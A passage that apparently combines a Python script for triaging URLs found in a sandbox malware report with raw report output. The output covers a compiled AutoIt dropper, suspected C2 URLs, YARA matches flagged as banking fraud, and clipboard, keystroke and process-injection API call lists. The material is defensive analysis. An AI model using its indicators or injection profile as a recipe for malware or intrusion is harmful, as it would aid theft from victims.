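Source: XBOIFKGKIWT.exe, 00000008.00000002.4014572631.0000000004C99000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.infovea.tech/3irn/
Source: RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
Source: RmClient.exe, 00000006.00000002.4010464904.000000000278B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
"""

LINE_RE = re.compile(r"Source: (?P<src>.*?)String found in binary or memory:\s*(?P<url>\S+)")
PROCESS_RE = re.compile(r"([\w.-]+\.exe)")

# Assumption: hosts this example treats as parking-page, browser or Microsoft infrastructure.
KNOWN_HOSTS = {
    "parking_template": ("loopia.se", "loopia.com", "cdn-image.com", "joker.com", "consentmanager.net"),
    "browser_search_default": ("ecosia.org", "duckduckgo.com", "search.yahoo.com", "google.com"),
    "microsoft_auth": ("login.live.com",),
}
# Heuristic: the whole path is one short alphanumeric directory, e.g. /44mq/ or /3irn/.
SHORT_DIR_PATH = re.compile(r"^/[A-Za-z0-9]{3,5}/$")
# Lower index = more interesting; a host takes the most interesting category of any of its URLs.
PRIORITY = ["c2_candidate", "unclassified", "parking_template", "browser_search_default", "microsoft_auth"]


def normalize_host(netloc):
    """Lower-case, drop any port and a leading 'www.' so www.Deacapalla.online == deacapalla.online."""
    host = netloc.lower().split(":")[0]
    return host[4:] if host.startswith("www.") else host


def categorize(url):
    """Return (normalized host, category) for one URL."""
    parts = urlsplit(url)
    host = normalize_host(parts.netloc)
    if SHORT_DIR_PATH.match(parts.path):
        return host, "c2_candidate"
    for cat, suffixes in KNOWN_HOSTS.items():
        if any(host == s or host.endswith("." + s) for s in suffixes):
            return host, cat
    return host, "unclassified"


def triage(text):
    """host -> {'category', 'processes' (sorted), 'urls'} for every matching report line."""
    hosts = {}
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        host, cat = categorize(m.group("url"))
        entry = hosts.setdefault(host, {"category": cat, "processes": set(), "urls": []})
        if PRIORITY.index(cat) < PRIORITY.index(entry["category"]):
            entry["category"] = cat
        entry["processes"].update(PROCESS_RE.findall(m.group("src")))
        entry["urls"].append(m.group("url"))
    for entry in hosts.values():
        entry["processes"] = sorted(entry["processes"])
    return hosts


if __name__ == "__main__":
    for host, entry in sorted(triage(REPORT_LINES).items(), key=lambda kv: PRIORITY.index(kv[1]["category"])):
        print("%-22s %-24s %s" % (entry["category"], host, ", ".join(entry["processes"])))
```

                Anything left in "unclassified" (digi-searches.com, deacapalla.online, dts.gnpge.com here) is what still needs a manual look; the parking and browser buckets can be deprioritized, and the two c2_candidate hosts are the ones to put in front of the network team.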
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00534164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00534164
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00533F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00533F66
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0052001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0052001C
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_0054CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0054CABC

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4010406938.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4010091145.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2453321754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4010291438.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4011798777.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4014572631.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2454199303.0000000003720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2454931273.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004C3B3A This is a third-party compiled AutoIt script.
                Source: 9MZZG92yMO.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 9MZZG92yMO.exe, 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_7bf626e8-8)
                Source: 9MZZG92yMO.exe, 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_32a3a2d0-c)
                Source: 9MZZG92yMO.exe | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_6a6fce1a-5)
                Source: 9MZZG92yMO.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` (memstr_76b5933b-0)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C083 NtClose
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040AA68 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03874340 NtSetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03874650 NtSuspendThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872BA0 NtEnumerateValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872BE0 NtQueryValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872BF0 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872AD0 NtReadFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872AF0 NtWriteFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872FB0 NtResumeThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872FE0 NtCreateFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872F30 NtCreateSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872E80 NtReadVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872EE0 NtQueueApcThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872DD0 NtDelayExecution
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872D10 NtMapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872CA0 NtQueryInformationToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872C60 NtCreateKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03873090 NtSetValueKey
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03873010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038739B0 NtGetContextThread
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03873D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03873D70 NtOpenThread
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D04340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D04650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D035C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D039B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D02D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D03090 NtSetValueKey
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D03010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D03D70 NtOpenThread
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_02D03D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001D8BE0 NtCreateFile
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001D8D40 NtReadFile
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001D8E30 NtDeleteFile
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001D8ED0 NtClose
                Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 6_2_001D9020 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0052A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_00518310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_005251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004CE6A0
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004ED975
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004CFCE0
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004E21C5
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004F62D2
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_005403DA
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004F242E
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004E25FA
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_0051E616
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004D66E1
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004F878F
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_00540857
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004F6844
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004D8808
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_00528889
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004ECB21
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004F6DB6
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004D6F9E
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004D3030
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004EF1D9
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004E3187
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004C1287
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004E1484
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004D5520
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004E7696
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004D5760
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004E1978
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004F9AB5
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_00547DDB
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004E1D90
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004EBDA6
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004CDF00
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_004D3FE0
                Source: C:\Users\user\Desktop\9MZZG92yMO.exe | Code function: 0_2_01109480
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004180C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040F953
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004011B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004162CF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004162D3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004022AC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004022B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00404367
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FB73
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DB79
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DB83
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401C20
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DCCC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DCD3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DD9D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042E653
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004026D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039003E6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C02C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F41A2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039001AA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F81CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03830100
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03864750
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385C6E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03900591
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EE4F6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E4420
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F2446
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F6BD7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390A9A6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03856962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038268B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0386E8F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384A840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03842840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038BEFA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03832FC8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384CFE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03882F28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03860F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E2F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B4F40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03852E90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FCE93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FEEDB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FEE26
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03840E59
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03858DBF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0383ADE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384AD00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DCD1F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E0CB5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03830CF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03840C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0388739A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F132D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382D34C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038452A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385B2C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E12ED
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0384B1B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0387516C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0382F172
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0390B16B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EF0CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038470C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F70E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FF0E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FF7B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F16CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03885630
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DD5B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039095C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F7571
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FF43F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03831460
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385FB80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B5BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0387DBF9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FFB76
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038DDAAC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03885AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038E1AA3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038EDAC6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FFA49
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038F7A46
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038B3A6C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038D5910
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03849950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0385B950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038438E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038AD800
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03841F92
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038FFFB1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03803FD2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03803FD5
